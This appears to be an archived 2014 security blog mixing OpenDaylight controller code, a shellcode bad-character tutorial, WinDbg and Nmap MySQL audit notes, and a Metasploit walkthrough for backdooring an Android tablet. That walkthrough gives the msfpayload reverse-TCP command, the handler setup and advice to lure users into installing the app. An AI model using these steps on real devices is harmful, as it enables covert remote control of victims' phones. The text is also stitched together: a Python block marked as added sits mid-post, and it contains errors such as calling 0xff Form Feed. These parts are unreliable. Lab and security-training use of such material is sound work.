Friday, April 25, 2014

OpenDaylight (ODL) Controller: Write Flow entries into the Switch Programmatically

public void addAllFlowsToSwitch(List<Flow> afc, NodeBuilder nodeBuilder) {
        /*
         ActionBuilder > list > ApplyActionsBuilder > ApplyActionsCaseBuilder > InstructionBuilder > list > InstructionsBuilder > flowBuilder
         */
        for(Flow flow : afc) {
            if (flow != null) {
                System.out.println("Adding Flow=" + flow.toString());

                FlowBuilder ffb = new FlowBuilder();
                ffb.fieldsFrom(flow);

                //ffb.setTableId(flow.getTableId());

                // Test values: every flow is forced into table 8 with cookie 8
                ffb.setTableId((short)0x8);
                ffb.setCookie(BigInteger.valueOf(0x8));

                if(flow.getId() != null) {
                    //ffb.setId(new FlowId(flow.getId().getValue()));
                    ffb.setId(new FlowId("1234"));
                }
                //FlowKey fkey = new FlowKey(new FlowId(flow.getId().getValue()));
                // Fixed key: each flow in the list is written to the same path and replaces the previous one
                FlowKey fkey = new FlowKey(new FlowId("1234"));
                ffb.setKey(fkey);

                DataModification<InstanceIdentifier<?>, DataObject> modification = dataBrokerService.beginTransaction();

                //System.out.println("addAllFlowsToSwitch: tid=" + ffb.getTableId() + "fc= " + ffb.getCookie() + "fkey=" + ffb.getKey().toString());

                InstanceIdentifier<Flow> flowRef = InstanceIdentifier.builder(Nodes.class)
                    .child(Node.class, nodeBuilder.getKey()).augmentation(FlowCapableNode.class)
                    .child(Table.class, new TableKey(ffb.getTableId())).child(Flow.class, ffb.getKey()).build();
                modification.putConfigurationData(nodeBuilderToInstanceId(nodeBuilder), nodeBuilder.build());
                modification.putConfigurationData(flowRef, ffb.build());

                Future<RpcResult<TransactionStatus>> commitFuture = modification.commit();
                try {
                    RpcResult<TransactionStatus> result = commitFuture.get();
                    TransactionStatus status = result.getResult();

                } catch (InterruptedException e) {
                    LOG.error(e.getMessage(), e);
                } catch (ExecutionException e) {
                    LOG.error(e.getMessage(), e);
                }
            }
        }
    }

We are using a two-phase commit procedure to write flows to the switches.

OpenDaylight (ODL) Controller: Read all Flow entries from the Controller's Cache

    public List<Flow> getAllControllerFlows(NodeBuilder tn) {
        List<Flow> coFlows = new ArrayList<Flow>();

        DataModification<InstanceIdentifier<?>, DataObject> cmodification = dataBrokerService.beginTransaction();

        short tablesAmount = 64;
        String nextArgument = "";

        System.out.println("Getting all Flow Entries present on Controller");
        for (short tableId = 0; tableId < tablesAmount; tableId++) {
            InstanceIdentifier<Table> pathToControllerTable = InstanceIdentifier.builder(Nodes.class)
                        .child(Node.class, tn.getKey()).augmentation(FlowCapableNode.class)
                        .child(Table.class, new TableKey(tableId)).build();
            Table ctbl = (Table) cmodification.readConfigurationData(pathToControllerTable);
            if (ctbl != null) {
                for (Flow flow : ctbl.getFlow()) {
                    if(flow != null) {
                        coFlows.add(flow);
                        //LOG.info("getAllFlows: flow {}=", flow);
                        System.out.println("=======================================");
                        System.out.println("getAllCFlows: flow= " + flow.toString());
                    }
                }
            }
        }
        System.out.println("=======================================");
        return coFlows;
    }

To read flow entries from the switch, see http://blog.disects.com/2014/04/opendayligtht-odl-controller-read-all.html

OpenDaylight (ODL) Controller: Read all Flow entries from the Switches

    public List<Flow> getAllSwitchFlows(NodeBuilder tn) {
        List<Flow> swFlows = new ArrayList<Flow>();

        DataModification<InstanceIdentifier<?>, DataObject> smodification = dataBrokerService.beginTransaction();

        short tablesAmount = 64;
        String nextArgument = "";

        System.out.println("Getting all Flow Entries present on Switch");
        for (short tableId = 0; tableId < tablesAmount; tableId++) {
            InstanceIdentifier<Table> pathToSwitchTable = InstanceIdentifier.builder(Nodes.class)
                        .child(Node.class, tn.getKey()).augmentation(FlowCapableNode.class)
                        .child(Table.class, new TableKey(tableId)).build();
            Table stbl = (Table) smodification.readOperationalData(pathToSwitchTable);
            if (stbl != null) {
                for (Flow flow : stbl.getFlow()) {
                    if(flow != null) {
                        swFlows.add(flow);
                        //LOG.info("getAllFlows: flow {}=", flow);
                        System.out.println("=======================================");
                        System.out.println("getAllSFlows: flow= " + flow.toString());
                    }
                }
            }
        }
        System.out.println("=======================================");
        return swFlows;
    }

Friday, April 18, 2014

Exploitation: Identifying Bad Characters in a Shellcode

Characters that break the execution of shellcode are considered bad characters.

Before delving deep, we should understand what Shellcode is
http://en.wikipedia.org/wiki/Shellcode

To find out which characters are bad for the specific application we are trying to exploit, generate a byte array covering 0x00 to 0xff, which can be done in Immunity Debugger with
!mona bytearray

Copy the generated byte array into the shellcode, i.e. after the NOP (\x90) sled. Exploit the vulnerable application and, at the time of the crash, check the alignment of the byte array in memory. A byte between 0x00 and 0xff that is missing, or at which the alignment breaks, is a bad character. Once a bad character is found, remove it from the byte array and exploit the application again with the new shellcode. Repeat this step until 0xff is reached.

Common Bad Characters
0x00    NULL (\0)
0x09    Tab (\t)
0x0a    Line Feed (\n)
0x0d    Carriage Return (\r)
0xff    Form Feed (\f)

I wrote a small program to generate the hex numbers
******************************************
root@kali-arpman:~# cat hex_numbers.c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    int i;

    printf("disects: Generate 0x00 to 0xff Hex Numbers\n");
    for(i = 0; i <= 255; i++)
    {
        /* start a new row after every 8 values */
        if(i%8 == 0 && i>=8)
            printf("\n");

        /* note: the '#' flag adds no "0x" prefix to zero, so 0 prints as "00" */
        printf("%#.2x  ", i);
    }

    printf("\n");
    return 0;
}
root@kali-arpman:~# gcc hex_numbers.c -o hex_numbers
root@kali-arpman:~#
root@kali-arpman:~#
root@kali-arpman:~# ./hex_numbers
disects: Generate 0x00 to 0xff Hex Numbers
00  0x01  0x02  0x03  0x04  0x05  0x06  0x07
0x08  0x09  0x0a  0x0b  0x0c  0x0d  0x0e  0x0f
0x10  0x11  0x12  0x13  0x14  0x15  0x16  0x17
0x18  0x19  0x1a  0x1b  0x1c  0x1d  0x1e  0x1f
0x20  0x21  0x22  0x23  0x24  0x25  0x26  0x27
0x28  0x29  0x2a  0x2b  0x2c  0x2d  0x2e  0x2f
0x30  0x31  0x32  0x33  0x34  0x35  0x36  0x37
0x38  0x39  0x3a  0x3b  0x3c  0x3d  0x3e  0x3f
0x40  0x41  0x42  0x43  0x44  0x45  0x46  0x47
0x48  0x49  0x4a  0x4b  0x4c  0x4d  0x4e  0x4f
0x50  0x51  0x52  0x53  0x54  0x55  0x56  0x57
0x58  0x59  0x5a  0x5b  0x5c  0x5d  0x5e  0x5f
0x60  0x61  0x62  0x63  0x64  0x65  0x66  0x67
0x68  0x69  0x6a  0x6b  0x6c  0x6d  0x6e  0x6f
0x70  0x71  0x72  0x73  0x74  0x75  0x76  0x77
0x78  0x79  0x7a  0x7b  0x7c  0x7d  0x7e  0x7f
0x80  0x81  0x82  0x83  0x84  0x85  0x86  0x87
0x88  0x89  0x8a  0x8b  0x8c  0x8d  0x8e  0x8f
0x90  0x91  0x92  0x93  0x94  0x95  0x96  0x97
0x98  0x99  0x9a  0x9b  0x9c  0x9d  0x9e  0x9f
0xa0  0xa1  0xa2  0xa3  0xa4  0xa5  0xa6  0xa7
0xa8  0xa9  0xaa  0xab  0xac  0xad  0xae  0xaf
0xb0  0xb1  0xb2  0xb3  0xb4  0xb5  0xb6  0xb7
0xb8  0xb9  0xba  0xbb  0xbc  0xbd  0xbe  0xbf
0xc0  0xc1  0xc2  0xc3  0xc4  0xc5  0xc6  0xc7
0xc8  0xc9  0xca  0xcb  0xcc  0xcd  0xce  0xcf
0xd0  0xd1  0xd2  0xd3  0xd4  0xd5  0xd6  0xd7
0xd8  0xd9  0xda  0xdb  0xdc  0xdd  0xde  0xdf
0xe0  0xe1  0xe2  0xe3  0xe4  0xe5  0xe6  0xe7
0xe8  0xe9  0xea  0xeb  0xec  0xed  0xee  0xef
0xf0  0xf1  0xf2  0xf3  0xf4  0xf5  0xf6  0xf7
0xf8  0xf9  0xfa  0xfb  0xfc  0xfd  0xfe  0xff
root@kali-arpman:~#

******************************************

When testing an application, include 0x01-0xff as part of the buffer that leads to the crash; once the application crashes, observe the characters in memory
0:000> d 0013e0e0
0013e0e0  cc eb 10 90 71 47 01 10-01 02 03 04 05 06 07 08  ....qG..........
0013e0f0  09 0a 0b 0c 0d 0e 0f 10-11 12 13 14 15 16 17 18  ................
0013e100  19 1a 1b 1c 1d 1e 1f 20-21 22 23 24 25 26 27 28  ....... !"#$%&'(
0013e110  29 2a 2b 2c 2d 2e 2f 30-31 32 33 34 35 36 37 38  )*+,-./012345678
0013e120  39 3a 3b 3c 3d 3e 3f 40-41 42 43 44 45 46 47 48  9:;<=>?@ABCDEFGH
0013e130  49 4a 4b 4c 4d 4e 4f 50-51 52 53 54 55 56 57 58  IJKLMNOPQRSTUVWX
0013e140  59 5a 5b 5c 5d 5e 5f 60-61 62 63 64 65 66 67 68  YZ[\]^_`abcdefgh
0013e150  69 6a 6b 6c 6d 6e 6f 70-71 72 73 74 75 76 77 78  ijklmnopqrstuvwx
0013e160  79 7a 7b 7c 7d 7e 7f 3f-81 3f 3f 3f 3f 3f 3f 3f  yz{|}~.?.???????
0013e170  3f 3f 3f 3f 8d 3f 8f 90-3f 3f 3f 3f 3f 3f 3f 3f  ????.?..????????
0013e180  3f 3f 3f 3f 9d 3f 3f a0-a1 a2 a3 a4 a5 a6 a7 a8  ????.??.........
0013e190  a9 aa ab ac ad ae af b0-b1 b2 b3 b4 b5 b6 b7 b8  ................
0013e1a0  b9 ba bb bc bd be bf c0-c1 c2 c3 c4 c5 c6 c7 c8  ................
0013e1b0  c9 ca cb cc cd ce cf d0-d1 d2 d3 d4 d5 d6 d7 d8  ................
0013e1c0  d9 da db dc dd de df e0-e1 e2 e3 e4 e5 e6 e7 e8  ................
0013e1d0  e9 ea eb ec ed ee ef f0-f1 f2 f3 f4 f5 f6 f7 f8  ................
0013e1e0  f9 fa fb fc fd fe ff 90-90 90 90 90 90 90 90 90  ................
0013e1f0  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0013e200  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0013e210  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0013e220  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0013e230  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................

If we observe carefully, characters 0x80, 0x82 to 0x8e, 0x91 to 0x9c, 0x9e and 0x9f are probable bad characters. One of the exploits I wrote didn't work if the shellcode had the above characters.
http://blog.disects.com/2015/03/webgate-edvr-manager.html
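
The comparison above can be done mechanically instead of by eye. The following is an added example, not code from the original post: it parses WinDbg `d` output and walks it against the byte sequence that was sent, separating bytes that came back altered from bytes that were dropped (which shifts everything after them) and from a buffer that was cut short. The function names and the two-byte lookahead used to tell a dropped byte from an altered one are choices made for this example; the rows are copied from the dump above.

```python
import re
# Rows 0013e150..0013e190 copied from the dump in the post; bytes 0x69..0xb8 were sent.
DUMP = r"""
0013e150  69 6a 6b 6c 6d 6e 6f 70-71 72 73 74 75 76 77 78  ijklmnopqrstuvwx
0013e160  79 7a 7b 7c 7d 7e 7f 3f-81 3f 3f 3f 3f 3f 3f 3f  yz{|}~.?.???????
0013e170  3f 3f 3f 3f 8d 3f 8f 90-3f 3f 3f 3f 3f 3f 3f 3f  ????.?..????????
0013e180  3f 3f 3f 3f 9d 3f 3f a0-a1 a2 a3 a4 a5 a6 a7 a8  ????.??.........
0013e190  a9 aa ab ac ad ae af b0-b1 b2 b3 b4 b5 b6 b7 b8  ................
"""
# Address column, then hex bytes separated by ' ' or '-'; the ASCII column is skipped.
ROW = re.compile(r"^[0-9a-fA-F`]{8,17}\s+([0-9a-fA-F]{2}(?:[ -][0-9a-fA-F]{2})*)")

def parse_windbg_dump(text):
    """Return the raw bytes shown by WinDbg `d`/`db` output."""
    out = bytearray()
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            out += bytes.fromhex(m.group(1).replace("-", " "))
    return bytes(out)

def compare(expected, observed):
    """Return ({sent: received} for altered bytes, [dropped bytes], byte where the copy stopped)."""
    altered, dropped, j = {}, [], 0
    for i, want in enumerate(expected):
        if j >= len(observed):
            return altered, dropped, want        # buffer was cut short at this byte
        if observed[j] == want:
            j += 1
        elif observed[j:j + 2] == expected[i + 1:i + 3]:
            dropped.append(want)                 # removed: the rest shifted left by one
        else:
            altered[want] = observed[j]          # same position, different value
            j += 1
    return altered, dropped, None

def as_ranges(values):
    """Collapse byte values into (first, last) runs for readable output."""
    runs = []
    for v in sorted(values):
        if runs and v == runs[-1][1] + 1:
            runs[-1] = (runs[-1][0], v)
        else:
            runs.append((v, v))
    return runs

if __name__ == "__main__":
    altered, dropped, cut = compare(bytes(range(0x69, 0xb9)), parse_windbg_dump(DUMP))
    print("altered:", [(hex(a), hex(b)) for a, b in as_ranges(altered)], "dropped:", dropped, "cut:", cut)
```

On these rows it reports 27 bytes in 0x80-0x9f replaced by 0x3f, while 0x81, 0x8d, 0x8f, 0x90 and 0x9d come back unchanged. Those five are the values Windows-1252 leaves unassigned, which suggests (an inference from the dump, not something the post states) that the input passes through a Unicode-to-ANSI conversion that substitutes '?' for unmappable characters.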

Other References
http://seclists.org/basics/2011/Mar/77
http://www.offensive-security.com/metasploit-unleashed/Generating_Payloads

Other interesting posts on the blog
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2014/04/nmap-scripting-engine-auditing-mysql.html

Saturday, April 12, 2014

Hacking Android devices using Metasploit Backdoor

In this post we will see how to use backdoors generated by Metasploit to gain access to Android devices. I am using a Nexus 7 tablet as the victim.

SETUP DESCRIPTION
192.168.1.102 Victim's IP address (Android Nexus 7 tablet)
192.168.1.140 Attacker's IP address (Metasploit)

I am using the AirDroid app on the Nexus 7 to download the Metasploit backdoor (say, a malicious app). In real scenarios we can host a web server with the malicious app and entice users to install the app using various social engineering techniques.

BACKDOOR CREATION
Kali Linux with the Metasploit Framework installed is used to generate the payload.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=4488 R > andr_bd.apk
msfpayload: Metasploit command to create payloads (exe, java, apk etc.)
LHOST (local host): attacker's IP address for the victim to connect back to
LPORT (local port): port for the victim to connect back to
R: msfpayload parameter that indicates generation of a raw payload
APK: Application Package file

Successful execution of msfpayload creates the andr_bd.apk app, which is a Metasploit reverse TCP backdoor. When the app is installed on an Android device, it connects back to the attacker's IP address (192.168.1.140 here). Copy the app to the Nexus 7 tablet using AirDroid and install it; successful installation will show the screenshot given below.

Before installing the app on the Nexus 7, the attacker needs to run the following Metasploit commands so that the victim's machine can connect back to the attacker's machine.
$ msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT
msf exploit(handler) > exploit 

We successfully got Metasploit’s meterpreter shell.

Post exploitation commands

Full paper can be accessed from
http://disects.com/whitepapers/Hacking_Android_devices_using_Metasploit_backdoors.pdf

Following articles might be of interest
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Saturday, April 5, 2014

WinDBG: Useful Debugging Commands

Open "Debugging Tools for Windows" help file
0:017> .hh

Display registers
0:017> r

Display Current Process
0:017> |.
0:017> |

Unassemble Function or address
0:017> uf mshtml!CElement::Doc
0:017> u address

Assemble Address
0:017> a address

Stack Trace
0:017> knL

Display Stack Backtrace
0:017> k

The Trace (t) command executes a single instruction or source line and optionally displays the resulting values of all registers and flags.
0:017> t

Set break point
0:017> bp address

List break points
0:017> bl

Search for a String
0:017> s -a 0x00000000 L?7fffffff "disects"

The DLL is loaded between 03b10000 and 03fd000; search this area for 5d c3
0:014> s 03b10000 l 03fdd000 5d c3

On Intel machines, looking at the disassembled SEH code, you will see an instruction to move DWORD ptr from FS:[0]. This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the application/thread may not have exception handling at all.

Dump the TEB
0:017> d fs:[0]

Displays the current exception handler chain
0:017> !exchain

Display information about a local variable, global variable or data type (structures and unions).
0:017> dt var1

array(arr1) under var1
0:017> dt var1 -a arr1

displays all types and globals under nt
0:017> dt nt!*

Looking at the default process heap, shows percentage of busy blocks
0:017> !heap -stat -h 00150000

Listing allocations with specific size
0:017> !heap -flt s fffe0

Display data at an address or a register
0:017> d 03694024-10
0:017> d esp

To which heap entry a particular address (here, 0c0c0c0c) belongs
0:017> !heap -p -a 0c0c0c0c

Refer to the link below for further reference
http://windbg.info/doc/1-common-cmds.html

Thursday, April 3, 2014

Nmap Scripting Engine: Auditing MySQL Server

Nmap is an Open Source tool for Network Mapping, Network Inventory and Security Auditing. Nmap uses raw IP packets to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
 
MySQL is an Open Source Relational Database Management System (RDBMS).
 
I am using Nmap TCP SYN scan to find all open ports.
 
Nmap Scripts are located at
/usr/share/nmap/scripts
on Kali Linux.
 
The snapshot below shows the scripts we used to audit the MySQL Server. Nmap scripts disclose critical information such as usernames, usernames without passwords, version, dumps of hashes, etc.

 
To run all the scripts related to MySQL execute below command.
# nmap --script "mysql-*" target_ip
 
In the commands from the above snapshots, replace 127.0.0.1 with the IP you want to scan/audit.